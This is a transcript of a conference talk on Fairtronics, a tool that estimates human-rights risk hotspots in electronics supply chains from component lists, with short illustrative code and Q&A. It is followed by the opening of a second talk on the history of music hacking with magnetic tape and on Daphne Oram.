The three persons here to announce are Andreas and, if I'm right, Sebastian and, if I'm right, because I only have the code names of course, Tamara. In their presentation they have their real names, or something like that. Okay, their presentation is actually about a tool. We all know that we use electronic gadgets everywhere, but we're not aware of what the human cost of all these things actually is, and they are developing a tool that shows us this information. It could probably, and hopefully, help us a lot in deciding what things we're going to use in our daily life. I want you to give them a welcome applause, please go ahead. Good morning, thanks for getting up early and coming here, really grateful for that. I'm Sebastian, this is Tamara, this is Andreas, and we are building a software tool for easy supply chain risk analysis. I will start by talking about the background of all this, what kind of risks we analyze and why; Andreas will talk more about how we do the analysis; and then Tamara will talk about our project Fairtronics. So the first thing I want to do is unpack this slogan a little bit. A supply chain is basically all the steps that happen to a product before it is a product, right? It starts with resource extraction, and then somehow components are being made or assembled, and at the end you have maybe a mobile phone or an Arduino or something like that. And when you work with supply chains, you basically have to acknowledge that electronics production happens all around the globe, so that's a major thing that makes it complicated. Risk in the sense of social risk: what we want to do is minimize harm that is caused to people involved in the production of electronics devices. Analysis in the sense that we compute it: we have a computational model of what kinds of harms and risks are in the supply chain of a product. And the whole thing is supposed to be easy, and easy is meant in the sense that you do not need to collect extra data. If you are designing an electronic product, the tool should work only with the data you already have. As I said, supply chains are global. Making electronics products is a global affair; basically any product you can think of will probably involve four to five continents, such as this smartphone here, which is a pretty typical case. It basically starts with resource extraction at the blue-green dots, and resources, or raw materials, are located all around the globe, so they come from South America, North America, Africa, Asia and so on. Then processing and manufacturing happens in a lot of other places, so basically the material for any product is shipped around the globe like crazy. The background of our work is essentially sustainability. You may have heard of this model of sustainability that is made up of three pillars: the social pillar, the environmental pillar and the economic pillar. Many people associate sustainability mainly with the environmental aspect, making things ecological, not emitting too much CO2 and so on, and that sometimes leads to the social aspect of sustainability being a little bit underrepresented. Social sustainability means avoiding harm, you know, improving people's well-being and so on, and that is exactly the aspect that is most important to our work. So what about the social sustainability of electronics supply chains?
Basically, you know, across all the stages of a supply chain you can find a whole huge catalog of human rights violations and other problems that are associated with the making of electronics products. From having to work in dangerous conditions, for instance being poisoned by toxic chemicals or being harmed when the safety precautions are not sufficient. Being forced to work, for instance because people are in so much debt that they need to repay it. Children having to work, people not being able to form unions, having to work too many hours, or not making a living wage even though people work, you know, 10 or 12 hours or more a day. Being displaced from one's home: for instance, when mines are being established or extended, it frequently happens that the people who have been living there are forced to move. Being discriminated against, or not enjoying social security, such as being able to take time off when you are sick. For instance, in gold mining many of these cases are well documented. Child labour happens in very many places, and also you may be aware that mercury is frequently used to extract gold when gold is being mined, and of course mercury is toxic, and sometimes safety precautions are not taken and people get poisoned and the environment gets poisoned. So these are just two simple examples to make it a bit more tangible, and the big picture is that the digitalization which we enjoy and celebrate here at Congress happens on the backs of the people who make these electronics. So how can we fix that? I want to go through three example steps, you know, three puzzle pieces of the solution. The first one is that there do exist some certifications that rule out certain human rights violations. For instance, you know the fair trade label from bananas or coffee or whatever, and there exists a Fairtrade certification for gold. There also exists another certification, Fairmined, also for gold, and yeah, these do rule out a good part of these human rights violations. There's another standard, IRMA, which is in the process of being established and which applies to more metals, or yeah, more materials that come from mining. But the problem with all these certifications is that they are not broadly available. So in each case there only exist a few mines that have a certification, and most of the mines don't. Another way to put this is that there does not seem to be a huge demand for certified metals at the moment, and I think this is one of the things that need to change. A second example is that when you are the designer of an electronic product, of course you get to decide what goes into that product, and you make a lot of design decisions, and of course these decisions determine what kind of raw materials are needed to build your product. This is a fun little example. This is a DIY mobile phone. So this phone was built in a FabLab, and at the back of the phone you see these two little knobs sticking out, and these little knobs are capacitors. They are aluminum capacitors, because the person who built this phone did not want to use tantalum capacitors, because tantalum is well known to be associated with the whole catalogue of human rights problems. So yeah, here you can very clearly see this design trade-off between making the phone a little bit thinner or avoiding the use of certain resources. Many metals can be recycled. Not all metals do get recycled, because it's not always cost effective.
But of course, when it's being done and when it's possible, recycling is a good way to reduce the overall amount of resources that are being extracted. Why is it not always cost effective? I think this is again partly a matter of supply and demand. When there's a larger demand for recycled metals, it would be cost effective to recycle a larger amount of them. So the general message is that there do exist alternatives, but then the question is: why do I keep telling you there's no demand? Why is there no demand? Why do not all people try to source their materials responsibly? And part of the answer is that electronics supply chains are very complex and very deep. This is a supply chain taken from the NagerIT project, a very nice project which is also a pioneering project in fair electronics. They tried to build the most sustainable computer mouse possible. They took the mouse because it's a very simple product, and they tried to map out their entire supply chain as far as possible. And you can see that even for this simple product, the supply chain chart is overwhelming. And you, as a designer or as a maker of an electronic product, are basically at the top of the supply chain, and you kind of have to look backwards and see what your suppliers are, and what their suppliers are, and so on. And with this huge number of steps, it's very difficult to know where to start. And this is where a tool comes in, and Andy will tell you a bit more about how that works. Okay, thank you. So yeah, we have learned now that there exist severe issues in the production of electronics devices, severe social issues. We want to do something about this. But we have also just seen that it is not an easy task, that supply chains for electronics products are complex and deep. So yeah, the question is where can we start, and one thing that someone as the designer of an electronics product does know is the components that go into the product. For example, here, the computer mouse: you can see it's made from the casing, there's the cable, there's the circuit board, there are resistors that go into it. So this is one thing that we know. And so the idea for our tool is that you can feed in this component list, maybe you have a bill of materials available, maybe you can just disassemble a device, feed it into our Fairtronics tool and get a hotspot analysis that tells you where the highest risk is, where the hotspots for social issues in your device are. So how could this be done? I will walk with you through some steps to make this more tangible. Like I said, one component in our computer mouse is the resistor. And if we take the resistor, we can start collecting generic data on what the resistor is made of. There's some copper forming part of the resistor, there's some iron forming part of the resistor. And one example of a data source that you can see here is from an environmental assessment of generic, or average, electronics components. What you can see listed here is the materials that an average resistor consists of by weight. For example, it's made of 61.71% copper or 12.49% iron by weight, this average resistor that we see here. Okay, so now we know something about the composition of one component. And when we follow that trail and say, okay, a large part of our component is copper, we can ask where the copper comes from. And here's another example of a data source that tells us something about this.
It's from the US Geological Survey. They publish yearly estimates of the global production of different minerals. And you can see that in 2018 Chile produced 5.8 million tons of copper, or Congo produced 1.2 million tons of copper in 2018. These are estimates based on publications from different firms or governments about their copper production. Okay, so we can assume that a certain amount of the copper that flows into our component, into the resistor, comes from Congo. And now we can ask, okay, how are the working conditions in Congo? Are people getting a fair salary there? How long do they have to work? Is there child labor possibly involved? Is there forced labor possibly involved in Congo? And there you can actually find quite some data on the country level that tells you something about working conditions in different countries. And our observation is also that the situation here is improving regarding the data quality that you get. Especially since the UN sustainability goals were established, you can find more and better quality data about social conditions, working conditions, in different countries. And here's one example from the International Labour Organization. They also publish a report with estimates of, in this case, the working poverty rate: the share of people who do work but still live below the poverty line. And in this case we are interested in Congo and see, okay, this rate is 70%. So 70% of the people in employment still don't have enough to live on. And a huge part of our work is to collect this data: to collect data about the raw material composition of electronics components, to collect data about production rates of these raw materials in different countries, and to collect data about the indicators that tell us something about the working conditions in these countries, bring it all into a common format and collect it in our database. And as soon as we have this data, we can, you know, start asking some questions and do some basic computations. For example, we might be interested in the significance of copper produced in Congo. Well, when we say, okay, Congo's share in the world production of copper is 5.81%, and the share of copper in our resistor's weight is 61.71%, we arrive at 3.58%. And we could interpret this as something like medium activity. So we can say, okay, around 3.58% of the copper in our resistor, we can assume, stems from Congo. And well, it's between 1% and 10%, so quite significant: it's medium activity, quite important for our resistor. Anything that is more than 10% would be high activity, anything below 1% would be low activity, just to qualify this a bit. And then, how severe are the impacts in Congo? If we take our example of fair salary, we have that working poverty rate of 70%, which is among the top 25% of rates for all the countries that we have for this indicator. And this is just a qualification that we can make at this point and say, okay, any rate that is among these top 25% of rates is high impact. And if we do this for our whole product, for the computer mouse, we can actually see that copper is not only the most prevalent metal in the resistor, but for the whole computer mouse, mainly due to the cable. So, well, copper is quite prevalent in our computer mouse. And we also identified a social hotspot from the data that we just had, and that is the copper extraction in Congo. And the impact category that we looked at is fair salary.
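To make the arithmetic just described concrete, here is a small sketch that reproduces the numbers from the talk: Congo's share of world copper production times the copper share of an average resistor gives the significance (roughly 3.6%, "medium"), and an indicator value in the worst quartile of all countries counts as "high" impact. Only the 5.81%, 61.71%, the 1%/10% thresholds and the 70% working poverty rate are from the talk; the other country rates below are made-up placeholders standing in for the full indicator table.

```python
def significance(country_share, material_share_in_component):
    """Share of the component's material that we assume comes from one country."""
    return country_share * material_share_in_component

def classify_significance(value):
    """Qualify the significance as in the talk: <1% low, 1-10% medium, >10% high."""
    if value < 0.01:
        return "low"
    if value <= 0.10:
        return "medium"
    return "high"

def classify_impact(country_value, all_values):
    """'High' impact if the country's indicator sits in the worst 25% of countries."""
    worst_quartile = sorted(all_values)[int(0.75 * len(all_values)):]
    return "high" if country_value >= min(worst_quartile) else "lower"

# From the talk: Congo produces 5.81% of the world's copper, and an average
# resistor is 61.71% copper by weight.
congo_copper = significance(0.0581, 0.6171)
print(f"copper from Congo in the resistor: {congo_copper:.2%} "
      f"-> {classify_significance(congo_copper)} activity")

# Working poverty rates: 70% for Congo is from the talk, the rest are
# placeholder values for the other countries in the indicator table.
placeholder_rates = [0.03, 0.05, 0.08, 0.12, 0.20, 0.35, 0.55, 0.70]
print("fair salary impact in Congo:", classify_impact(0.70, placeholder_rates))
```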
And one interpretation of this analysis would be: okay, if we find a source of fair, certified copper for the cable, or find some producer of cable that is willing to work with us on improving the situation, that would be a big step forward for the fairness of the computer mouse. Now, there are some limitations of this approach that I would like to point you to. For one, it's an assessment on a very generic level, so you should take this with a grain of salt. It's just there to highlight hotspots, to highlight those areas where it's worth looking deeper and trying to identify the real issues behind this. In our whole approach we follow a methodology called social life cycle assessment, which is similar to environmental assessments of products. So you look at the whole supply chain, the whole life cycle of a product, and in an environmental assessment you are interested in the CO2 emissions or in the water use that happens during the whole life cycle. In our case we just have different impact categories. So the impact category is not water use or CO2 emissions, but direct social impacts. And these are the ones that we are focusing on: anything related to workers, freedom of association, working hours, forced labour, health and safety, social security, equal opportunities, child labour and fair salary. And also, as you can see from the example, we are focusing right now just on the raw material extraction phase. In the future this should be extended to also cover other life cycle phases, to get to a full social assessment. Okay, and now I will pass on to Tamara, who will tell you more about our project and the tool that we are developing. So thank you. Now that Sebastian has already told you why we are working on this project and Andreas has told you how we are doing it, I would like to show you a bit of what we have done already. So, we are building a web-based analysis tool to identify social hotspots. You can see a screenshot of the current work in progress here. It should be an MVP, and it should be done by the end of February. And to revisit that example of the computer mouse: here you can see that the component you should look at first is the data cable, and that if you find a sustainably sourced or fair copper for your product, that would be a significant improvement. And now you may be wondering: that is really great, and how can I contribute to it? So first of all, to all the makers of electronic products: it would be great if you let us know what kind of tools you currently use and what formats you export. You could just send us your bill of materials lists or PCB layouts so we can offer templates, because we want it to be really easy to use. Another thing is: just use our tool by the end of February, give us feedback, tell us what functionalities are working for you and what are not. And yeah. Another thing is, we are an open source project. We would love to collaborate. So if you have time on your hands and you're motivated and passionate about the subject, just join us. You can find us on GitLab; here's the link. A very crucial matter is the procurement of data. Without data, we cannot conduct an analysis. Our current database is rather tiny, and a lot of manual labor went into it. And even though there have been significant improvements concerning open source data for social indicators, it's still not in a standardized format that you can feed into a coherent system quickly. And another thing is the raw materials that constitute components.
There it's even harder to find something. So if you're in possession of data, if you're perhaps a manufacturer and you have lists, or if you just love to extract data in an automated way, yeah, let us know. And the last thing is: talk about it. Even if you're not a maker yourself, spread the word, talk with people about it. The more people know and think about it, the more can hopefully be done, and at the bare minimum people become more conscious of this topic. And to wrap up this talk, I'd like to reiterate what Sebastian said in the beginning. Currently, in the production of electronic products, human rights are violated at almost every step of the supply chain. And this must not be the case. And this does not have to be the case. As he said earlier, there are alternatives. You can use certified raw materials, you can use materials from certified mines. You can actively take worker conditions into consideration in the design process. And you can use recycled material if possible. But most importantly, you can increase the demand for sustainably sourced raw materials and a fair production of electronic products. And here's also our contact information. So feel free to write us an email, or, since you're here and we're here, you can come and talk to us. And I'd also like to thank the Prototype Fund at this point, because they have been funding us so far, and that was a great help. Yes. Thank you. And thank you for your attention, your interest and your time. Super. Thank you. Wow. You can be really proud of your product. I wonder if there are questions here among our audience, who are clearly wide awake and fresh. And to the point, I hear: number two, yes, please. Is it on? Ah, no. Okay. Collecting data is a difficult task, as you just said. So I wanted to ask if you share it with other databases like Wikidata or another open data source, or if you, like, only keep it to yourself because it's too hard to actually connect to other data sources. Well, technically we're working on a REST interface for the data that we collect, and we happily share it. For some of it, we are not sure if we are allowed to share it. So if there's some expert here concerned with property rights of databases, it would be great to talk about that, but we happily share the data that we can. And if you want to connect here, great. Okay. Thank you. Here at number one. Thanks a lot for the presentation, and I'll probably send you some bills of materials soon. I mean, I've got one question. I know that FairLötet offers the Stannol soldering tin, but do you also plan to offer solder paste? Because for SMD assembly, obviously, it's not possible to use that FairLötet product. Yeah. Okay. So for context: basically, that was our inaugural project at FairLötet. We're an association that works on fair electronics. And yeah, basically the first project we did was that we got together with Stannol, which is a maker of solder products, and designed a solder wire, so what you would use when you have your soldering iron. So I would suggest that you get in contact with Stannol directly. Actually, we are not so much involved in distributing the solder anymore. Number one. Sorry, can you repeat the question, please, because the mic was... Okay. So there is no product on the market at the moment which you can recommend for solder paste. Stannol have their own product line they call Fairtin. That is tin with a traceable origin, following best practices in mining. So that might be an option for you.
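Since the speakers ask makers to send in bill-of-materials lists so they can build import templates, here is a purely hypothetical sketch of what such an input and a first aggregation step could look like. The CSV columns, the component names and the composition table are invented for illustration and are not the actual Fairtronics input format; only the resistor fractions echo the averages quoted in the talk.

```python
import csv
import io
from collections import defaultdict

# Hypothetical bill of materials: component type, quantity and weight in grams.
# This is NOT the real Fairtronics template, just an illustrative format.
bom_csv = """component,quantity,weight_g
resistor,12,0.3
cable,1,18.0
led,2,0.2
"""

# Generic material composition per component type (fractions by weight).
# Resistor values echo the averages from the talk; the rest are placeholders.
composition = {
    "resistor": {"copper": 0.6171, "iron": 0.1249},
    "cable":    {"copper": 0.60},
    "led":      {"gallium": 0.02, "copper": 0.10},
}

# Aggregate: how many grams of each raw material end up in the product.
totals = defaultdict(float)
for row in csv.DictReader(io.StringIO(bom_csv)):
    weight = int(row["quantity"]) * float(row["weight_g"])
    for material, fraction in composition.get(row["component"], {}).items():
        totals[material] += weight * fraction

for material, grams in sorted(totals.items(), key=lambda kv: -kv[1]):
    print(f"{material:>8}: {grams:6.2f} g")
```

Feeding totals like these into the country-share and indicator step sketched earlier is, in outline, how a component list can be turned into a hotspot estimate.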
Okay. We have question number two. Thank you. Can you hear me? Thank you very much for your talk. I was wondering, have you gotten in contact with purchasing organizations? Because in supply chains nowadays you often have a service provider that sits in between the producer who buys the products and the vendors, and often these purchasing service providers are asked to help control the supply chain. We haven't, actually, and to be honest, I think we need to start at the point where there is some kind of momentum. And for us, I think it's easier to reach people like you, you know, maybe hardware developers, or maybe small enterprises, or maybe just activists. Because, I mean, I cannot really make broad statements, but I think big parts of the whole industry are kind of conservative when it comes to stuff like sustainability, and we kind of have to work our way through there, I think. Okay. We have question number three there. One second. Yes, please. Number three. First of all, thank you for your talk. My question is: you used a relative approach regarding the evaluation of the impact category, and I was wondering if there was a specific reason for that, or if, I mean, you could have instead just evaluated the absolute values by which you compare the different countries. You mean to have some kind of reference point and say, okay, it's better or worse than a certain reference point? The approach that I showed you right now is our starting point, where we are following, well, an approach modeled after one that we found in the literature. And that seems doable for us right now within this six-month timeframe that we have to arrive at a full prototype, but it's not fixed. So certainly the whole methodology can still be improved. So yeah, that's pretty much what I can say to that. Thank you. Fine. Thank you. Yes, sir, please. Hello. My question also concerns the relative impact approach that analyzes, for example with the mouse, which countries and which materials from these countries had an impact. And I was also wondering whether, apart from the country of origin and its world market share, and also the share of weight in the product, as you showed with copper, you're also taking into consideration other factors, for example the rarity and different impacts of materials, for example copper being more common than tantalum, as you mentioned. And whether you would consider adding that as an additional factor to your analysis. Okay. Right now we do not consider it, but one could certainly think about it. Maybe we can talk later about this idea. That would be great. Yeah. That's fine. Do we have questions online? No one? We're all asleep. I see someone here at number two. Please, sir. Yeah, hi there. I'm also a Prototype Fund recipient. It's really, really cool to see them doing all this nice awesome stuff. I am a happy Fairphone owner, and I also have another, non-Fairphone phone. And the Fairphone was twice the price of the other one. And whenever people ask me which one they should get, I say, like, well, do you want to spend twice as much? That's what you have to get yourself into. In the face of the fact that we have this failure market-wise, do you see a new role for regulation to actually make it easier for people who build things like this to do the right thing?
Because when you speak to small businesses, the thing that people always push back at me with is that we cannot make this viable at these prices, so we're forced to use all the non-fair parts in our electronics. So concerning regulation: yesterday I gave a lightning talk on the Lieferkettengesetz. Right now there's a broad NGO campaign going on that is trying to establish mandatory human rights due diligence in Germany, but there are also initiatives in other countries such as Switzerland, France already has a supply chain law, and so on. And there are also some processes on the EU and UN levels. So I think that is, I mean, that is basically the bare minimum, right? I mean, not violating human rights should actually not be something special. It should be, you know, something everyone does. Yeah, okay. That's absolutely the point, actually, with our lifestyle, a Western world hooked up to electronics. And yeah, we can't live without it. But I had a question as well for you. Or isn't there another one? I have a question, but number three first, please. Hello, I have a question about the lack of data. You said you need more data, and you asked for data sheets of parts. But I think you also need more data about metals or working conditions. Do you have a top three of data that you would appreciate, on the metals or on the working conditions in countries, for example? Probably we can provide you with that. It would be hard to say something about a top three. It's just, well, right now we are at a state where we think, okay, on a very generic level we can cover most of the minerals that are relevant, we can cover most of the countries, but for the indicators there are still a lot of gaps. Maybe you can find an indicator for child labor, but it covers only 20 countries and not all of the countries. So on this very generic level we are quite complete, but a good next step, for example, would be to get data that is more specific to industries and not only on a country level. That would be great. In general it's just, well, we need more of everything. And also components and what raw materials they consist of. So yeah, as Tamara just said, the component composition is maybe the more severe lack that we have right now. The more generic it is, the less accurate it is. May I ask a question as well? We still have a few minutes left. Did you mention how you are financed or backed, or did you already cover that? I think I did. I'm not sure, but there's also the logo. And where does this bring you, to which stage? Meaning, is the product there, or is there something waiting in the future? Until the end of February, when this funding round is finished, we want to have a minimal viable prototype. But I think all of us would be happy to see more of that in the future. So basically the period where we're being funded by the Prototype Fund is almost over, it runs until February, but the association will try to keep the project going as best as possible. So we're also trying to build a small developer community around it. Yeah, and let's see what happens then. Yeah, so spread the word, I would say, so that you have more data as well in your database before the end of February. So we'd ask everyone to give a warm applause, and remember: give them the data and they can take it further. Thank you. Thank you guys for the interview. Fantastic. Thanks for joining us. Go for it. Check it out.
Electronic gadgets come not just with an ecological footprint, but also a human cost of bad working conditions and human rights violations. To support hardware makers who want to design fairer devices, we are building a software tool to easily discover social risk hotspots and identify measures for improvement. The issue of human rights violations in the supply chains of electronics products is nowadays being broadly discussed. However, from the point of view of a hardware maker, it is difficult to exclude the possibility of harm being done to workers in their supply chains due to their complexity and lack of transparency. At the same time, projects such as Fairphone and NagerIT demonstrate that improvements are, in fact, possible. At FairLötet and the Fairtronics project, we try to support those who would like to improve the social impact of their products in taking the first step towards improvement. To this end, we are building a software tool which will provide a first estimate of the risks contained within a given design: circuit diagram in, analysis out. The analysis shows the main social risks associated with the product, due to which components and materials they arise, and in what regions of the world the risks are located. This enables the user to understand where efforts towards sustainability should be concentrated, e.g. by making informed purchasing decisions or engaging with suppliers. In this talk, you will learn about the risks associated with electronics, how they are estimated, and what data we gather to compute them. No deep background in sustainability or hardware is required.
10.5446/53212 (DOI)
Fantastic that you all are here, actually, since it's already the teardown moment, and still we have lots of people here. This is an interesting talk as well, because it's Helen Leigh who's going to present, actually give us an overview, about what hackers in music have meant throughout history. So she gives an overview, and as I understood she gives certain examples as well, and I think she's going to take this a little bit further because she's going to talk a little bit about her current work and future objectives. So fasten your seatbelts, I would say. Helen Leigh, please give her a warm applause. Hello. Yep, so I'm Helen. This is, if you want to follow my stuff or download any of my things that I mention in the talk, I've got GitHub and various things, and I put lots of my work on Twitter. So okay, right. I am going to talk to you today about, well, we're gonna give you a story. I'm gonna give you a story about how a group of music hackers in the 1940s changed the face of music technology forever, and how they didn't really know what they were doing but still managed to do some incredibly cool things by just disregarding the rules and being really awesome hardware hackers. And I'm also gonna give you an overview of some of the coolest projects coming out of London and Berlin at the moment. I'm living in Berlin at the moment, but I was active in the music hacking scene in London for a long time as well, so I'm gonna show you some cool projects. But before I start off on my story and cool projects, I'm going to just introduce myself. I am a creative technologist, which is a ridiculous buzzword, but people like to put you in a box. I'm basically a massive nerd who really likes arty stuff, so I like to smush them together. My favorite things to smush together are electronics and hardware with music technologies. And with that in mind, I make a lot of strange musical instrument creations, usually very experimental in form, and I'll show you some of that as well. This is one of my experimental instruments. I make sonic circuit sculpture creatures, and I've taken them on residencies in London, Shenzhen and Copenhagen, and I just really like experimenting with what a musical instrument looks like, and not so much what it sounds like. I mean, I am into other people's noise art, but for me, I like my instruments to sound melodic. But yeah, form I'm very interested in experimenting with. I also really like, at the moment, well, this is made out of brass, and I've made a lot of stuff with different metals, but at the moment I'm on a big soft circuit kick, so I'm experimenting with electronic embroidery and soft robotics to make kind of kinetic, sculptural, squishy creature things, and I'll show you some of that later too. Now, obviously this doesn't pay my rent, shockingly, and so I also do some product design and a lot of curriculum-based things, and I'm a writer as well. So this is a product that I designed, that's actually my hand on the box, very exciting, and it's a wearable instrument for children sold by Pimoroni
and Adafruit and, you know, etc. It's a DIY wearable gesture-based instrument for children to learn how to code with, and I designed that with Imogen Heap. I'll tell you about that cool project later, but that's something I do. I also do a lot of writing. This is a still from one of my books, it came out last year, one called The Crafty Kids Guide to DIY Electronics, where I teach basic electronics through the medium of papercraft, origami, sewing and kind of DIY robotics as well. I also write for Hackaday, I've written for blah blah blah, it doesn't matter, I write words for money sometimes. Anyway, that's me. I am gonna tell you one of my favorite stories of music tech history. I'm gonna start off here with this rather pretentious quote from a rather pretentious man who I still kind of love, a guy called John Cage, who most people know for his experimental compositions and his many and varied writings on the subject of what is sound and what sound art is. But he was also, pretty early on, a hardware hacker. He made experimental instruments; actually one of his first famous pieces was him, like, smashing up a piano and changing it. So he was a composer, but he was also an experimental hardware artist. And he said this: there is no noise, there is only sound. And the reason I put this quote up there is to kind of remind you that all music is made up, okay? All instruments are inventions. The violin wasn't a violin until probably the 13th century, when various instruments that came before it converged and someone used new techniques, new tools, and it keeps evolving through the ages, right? So you could think of an instrument as a specific thing, but it's really not. We've been messing around with sound since we've been humans, basically. And ditto with compositions. You might think of classical music mainstays like Stravinsky, Strauss or Debussy as these kind of boring establishment figures, but actually in their day they were seen as avant-garde. People walked out of their performances, there were hit pieces about them in the papers, you know, the Daily Mail of the time. And so basically anything that sounds strange to you now, or something that's experimental to us, could well have an influence in a long-reaching way. So yes, I'm gonna tell you about my favorite conspiracy theory as well. Even down to the note A, 440 Hertz, middle A: it was not, sorry, it was not 440 Hertz until the 1950s, when a group of dudes met up in one room in London and everybody signed this agreement saying, okay, now A is 440 Hertz. Before that, a flute in Italy might sound different to a flute in France; you'd have these small tonal variations. And so it wasn't until the 1950s that it actually became the note A. There's a wonderful series of conspiracy theories around this, that they actually chose 440 Hertz because it's a method of population mind control, and there are alternative websites out there now. You can literally go, if you search for, like, 440 Hertz conspiracies, there are websites, like groups, that are campaigning for it to be changed, for the whole of modern music to be changed. There's one at 432 and there's one at 438, and if you're in the 438 camp, because they were opposing camps as well, so if you're in the 438 camp you're in luck, because someone's made a music adjuster, okay? So you can take your track that you've done and you can put it into a
converter and it will convert all of your music into 438. So you can do that if you like. And there's even a radical fringe group calling for middle A to be 538, which is absolutely insane, but there we are, I love it. And so if you ever want to go down a conspiracy theory YouTube black hole, which you probably will do, we're all at Camp, I mean Congress, not Camp, then you can look at that. But basically my point here is that music is all made up, right, and instruments are all inventions, so you know, there are no rules. And I'm gonna take you through one of the many paths of music history and music hacking, and we're gonna look at one piece of hacked technology and how people who played with it, and did things with it that they weren't supposed to do, changed modern history, modern music production. This is the magnetic tape recorder, and it's a lovely device. It was popularized in World War Two by the Nazis, who used it to chop up propaganda, and after the war the BBC took it on themselves to try and develop a version of this. So this is relatively modern technology; in the 40s and 50s it started becoming popular, and it was used for reel-to-reel broadcasting, right? Before this it was gramophones. So they were used in music studios, and they were relatively expensive. As they became cheaper, a bunch of music hackers saw their potential to do something more than just line things up. So these hackers got their hands on a bunch of these magnetic tape recorders, and, as people are wont to do with technology that they get their hands on, they started to fuck with it in new and very exciting ways. What they did, as a movement in Paris in the 1940s called musique concrète (the first group of people who were doing this, aside from one lonely guy in Egypt as well, but the epicenter of this was in Paris), is you take the actual tape, you use a razor blade to cut it, and then you can, for example, flip it over, tape it back together, and then you've got one piece that's backwards, right? Okay. And using that technique, I'll show you what you can actually do. So not only can you chop things up and turn them around, you can speed them up and slow them down. So basically, if you play it faster it will give you a higher tone, and if you slow it down it will be lower, okay? We all know this kind of instinctually now, but back then this was completely revolutionary. You could make sounds that did not exist in nature. Take, for example, the plucking of a violin string, okay? You pluck a violin string and it comes on quick, it's like boom, and then if you let it die off there's a long tail. So what we call that in music is a sharp attack and a long decay, and that's how a lot of musical instruments or natural sounds work, okay, they fade off. But using this technology you could switch it around so it had the opposite effect, the other way round: a long attack and a short decay. So you could create sounds that are not found in nature, which is extraordinary.
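For anyone who wants to play with the tricks just described, flipping the tape, speeding it up or slowing it down, here is a small sketch of how you might emulate them digitally. This is not anything from the talk, just a modern analogue of the razor-blade-and-sellotape techniques: the input file name is a placeholder, the recording is assumed to be mono, and the naive resampling changes pitch and duration together, exactly like changing the tape speed.

```python
import numpy as np
from scipy.io import wavfile

# Load a mono recording; the file name is just a placeholder.
rate, samples = wavfile.read("found_sound.wav")
samples = samples.astype(np.float32)

# Trick 1: flip the tape over. The sound plays backwards, so a plucked note
# becomes a long swell ending in a sharp cut (long attack, short decay).
reversed_take = samples[::-1]

# Trick 2: change the tape speed. Playing the same samples faster raises the
# pitch and shortens the sound; slower lowers it. Resampling by interpolation
# is the digital equivalent of running the tape at a different speed.
def change_speed(audio, factor):
    old_positions = np.arange(len(audio))
    new_positions = np.arange(0, len(audio), factor)
    return np.interp(new_positions, old_positions, audio).astype(np.float32)

double_speed = change_speed(samples, 2.0)   # one octave up, half as long
half_speed = change_speed(samples, 0.5)     # one octave down, twice as long

wavfile.write("reversed.wav", rate, reversed_take.astype(np.int16))
wavfile.write("double_speed.wav", rate, double_speed.astype(np.int16))
wavfile.write("half_speed.wav", rate, half_speed.astype(np.int16))
```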
And at the same time there was the advent of something called field recording, which meant you could go outside: instead of having to record in a studio, you could have a physical piece of equipment that you could carry around with you, and a microphone, so you could go and record sounds outside. Found sound is what we call it. And then you could take it back to the studio, chop it up with a scalpel, sellotape it back together, re-record it, and you could create, well, this is just a huge, vast new set of tools that you can work with as somebody who's making music. Now, the first people doing this were, as I say, these French guys in Paris in musique concrète, and due to modern digital preservation techniques you can hear the sounds that they were making on YouTube. You can spend some time and listen to that, and I won't lie, it sounds pretty awful, and nobody wants to listen to that, I mean, unless you're a true enthusiast. But it's not that the music they were making matters; it's that the techniques they were creating, their experimentation, sounded terrible but was actually incredibly influential. We use sampling now as just an ordinary thing, but this was the technology behind it, and it really came to a head in the 1960s when the Beatles were the first people to use this technique on Tomorrow Never Knows. Now, normally I would play this, but when I did a talk similar to this at the Hackaday Superconference they pulled my livestream because there was a 10-second snippet of the Beatles, so I've decided not to risk it today. You can look up Tomorrow Never Knows and you can hear these kinds of sounds, and that's actually flipped, that's just flipped sound. All of the Beatles brought in sounds from their homes, they flipped them around, speeded them up and slowed them down. There's a famous, like, very high-pitched sound in that song, and it's just Paul McCartney laughing, and they've manipulated it using sticky tape and scalpels. Anyway, so that was the beginning of these new production techniques, right? You can use these in modern music, you know, in your Ableton or your Logic or whatever, those are just standard features, but this was the beginning of it, and it's incredibly influential. I could follow it down this path, but I'm actually gonna leave them to go on with their modern mainstream production, and I'm gonna talk about this woman instead. One of my favorite things about hacker culture is the way that we learn from each other and the way that we riff off of each other's work, and so I'm gonna go slightly sideways and talk about this artist and engineer. Her name is Daphne Oram. Who's heard of Daphne Oram? All right, about ten of you, which is more than usual, actually, to be honest. So, Daphne Oram: everyone should know her name, and that's why I never shut up about her. She was a musician and physicist and electronics engineer who was unfortunate enough to be a woman and has a pretty tragic work history, but she's one of the iconic figures of early electronic music. She should be as well known as, you know, Moog or whoever, but anyway. So she's a trained musician, and she got a job at the BBC cueing up these reel-to-reel magnetic tape recorders, which was actually a pretty big deal at the time for a woman. She went on a training course to Paris on studio recording techniques, you know, standard corporate training, right? And while she was there, I believe she met some of the people behind musique concrète, and they showed her what they were doing, and it totally blew her mind. She was like, oh my god, I'm gonna take this back to the BBC, it's gonna be so cool, I'm gonna
revolutionize everything, it's gonna be awesome. And she took it back there and, for about five years, it was like: no, go back to pressing buttons. So she did, but she also would run around the BBC late at night, after hours, stealing bits of equipment from other people's studios and wheeling them into her own studio, and she would experiment with all these musique concrète methods. As an electronics person as well, she was one of the first people in the world to make purely electronic music, and she was one of the first instances of someone who recorded her oscilloscope and then started using that for compositional purposes as well. She was doing this for maybe five, six, seven years, and at the end of that she started to get some interest. She finally managed to convince somebody to give her a commission to create some incidental music for a show, and it was a success, and also people hated it, of course. But enough people wanted her to repeat it that eventually the BBC gave her her own studio, which was, like, absolutely out of the question for a woman in the 50s. And so she was starting to make this, and at this point it's called the BBC Radiophonic Workshop, which is one of the most iconic sound design workshops and studios in the whole history of music technology. So she starts this workshop, the BBC Radiophonic Workshop, but a year later she leaves to start her own artist practice, because, she said, they wanted my ideas and they wanted my work, but they didn't want me. So she had to leave her life's work, and she was largely erased, actually, from everything that she did, even though she founded this absolutely iconic workshop. She went off, and she didn't have a sad life after that, but she went off and created this wild synthesizer, which is in the London Science Museum now. She loved looking at the waveforms of music, so she thought she would use watercolor to draw the waveforms and then have a synthesizer interpret those waveforms, and that's called the Oramics machine. It's, like, absolutely wild, you can look that up on the internet as well, it's cool to look at. So yeah, she's becoming a bit more popular now because of the work of some of the guys at the Radiophonic Workshop who are still around, some of the old guys who go around telling cool stories about it all, but also because of the woman she helped bring in, who stayed after she left and who's quite famous now because of something I'll show you. It's this lady, and this is Delia Derbyshire. Who's heard of Delia Derbyshire? A lot more of you, I thought 